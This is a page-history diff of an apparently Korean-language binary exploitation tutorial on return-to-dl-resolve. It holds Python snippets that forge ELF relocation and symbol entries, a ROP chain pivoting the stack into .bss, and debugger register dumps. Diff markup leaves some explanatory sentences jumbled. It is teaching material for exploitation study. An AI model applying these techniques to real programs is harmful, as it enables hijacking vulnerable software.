Versions Compared

Old Version 5

changes.mady.by.user Lazenca.0x0

Saved on

compared with

New Version 6

changes.mady.by.user Lazenca.0x0

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
languagepy
titleFAKE reloc_arg, Fake Elf32_Rel, Fake Elf32_Sym
stack_size = 0x300
base_stage = addr_bss + stack_size

addr_fake_reloc  = base_stage + 20
addr_fake_sym 	 = addr_fake_reloc + 8
addr_fake_symstr = addr_fake_sym +16
addr_fake_cmd 	 = addr_fake_symstr +7
 
fake_reloc_offset = addr_fake_reloc - addr_relplt
fake_r_info 	  = ((addr_fake_sym - addr_dynsym) * 16) & ~0xFF 	#FAKE ELF32_R_SYM
fake_r_info	  = fake_r_info | 0x7					#FAKE ELF32_R_TYPE
fake_st_name 	  = addr_fake_symstr - addr_dynstr

 Move to ".bss"(Change the value of the esp register)

  • vuln()함수의 취약성을 이용해 ".bss" 영역에 2번째 ROP코드를 저장한 후에 ".bss" 영역으로 이동하기 위해 다음과 같은 ROP코드를 작성합니다.
    • "pop ebp; ret" Gadget을 이용하여 base_stage 값을 ebp 레지스터에 저장합니다.
    • "leave; ret" Gadget을 이용하여  Gadget을 이용해 코드의 흐름을 Stack 영역에서 ".bss" 영역으로 변경됩니다.
      • "leave; " 명령어에 의해 ebp 레지스터에 저장된 값을 esp에
      저장한 후 base
      • 저장됩니다.
      • "ret;" 명령어에 의해 rsp 레지스터에 저장된 주소(Gadbase_stage +
      0x4영역으로
      • 0x4)이동합니다.
Code Block
languagepy
titleMove to ".bss"
#read(0,base_stage,100)
#jmp base_stage
buf1 = 'A'* 62
buf1 += p32(addr_plt_read)
buf1 += p32(addr_pop3)
buf1 += p32(0)
buf1 += p32(base_stage)
buf1 += p32(100)
buf1 += p32(addr_pop_ebp)
buf1 += p32(base_stage)
buf1 += p32(addr_leave_ret)
  • asdf
Code Block
RAX: 0x127 
RBX: 0x4141414141414141 ('AAAAAAAA')
RCX: 0x7fd67462e260 (<__read_nocancel+7>:	cmp    rax,0xfffffffffffff001)
RDX: 0x190 
RSI: 0x601440 ("AAAAAAAA\n\006@")
RDI: 0x0 
RBP: 0x601440 ("AAAAAAAA\n\006@")
RSP: 0x7ffdc28c1b38 --> 0x7ffdc28c1b60 --> 0x1 
RIP: 0x400585 (<vuln+31>:	leave)
R8 : 0x400620 (<__libc_csu_fini>:	repz ret)
R9 : 0x7fd674911ab0 (<_dl_fini>:	push   rbp)
R10: 0x37b 
R11: 0x246 
R12: 0x4141414141414141 ('AAAAAAAA')
R13: 0x4141414141414141 ('AAAAAAAA')
R14: 0x4141414141414141 ('AAAAAAAA')
R15: 0x4141414141414141 ('AAAAAAAA')
RAX: 0x127 
RBX: 0x4141414141414141 ('AAAAAAAA')
RCX: 0x7fd67462e260 (<__read_nocancel+7>:	cmp    rax,0xfffffffffffff001)
RDX: 0x190 
RSI: 0x601440 ("AAAAAAAA\n\006@")
RDI: 0x0 
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x601448 --> 0x40060a (<__libc_csu_init+90>:	pop    rbx)
RIP: 0x400586 (<vuln+32>:	ret)
R8 : 0x400620 (<__libc_csu_fini>:	repz ret)
R9 : 0x7fd674911ab0 (<_dl_fini>:	push   rbp)
R10: 0x37b 
R11: 0x246 
R12: 0x4141414141414141 ('AAAAAAAA')
R13: 0x4141414141414141 ('AAAAAAAA')
R14: 0x4141414141414141 ('AAAAAAAA')
R15: 0x4141414141414141 ('AAAAAAAA')


Return-to-dl-resolve

  • ".bss" 영역에 다음과 같이 Data를 저장합니다.

...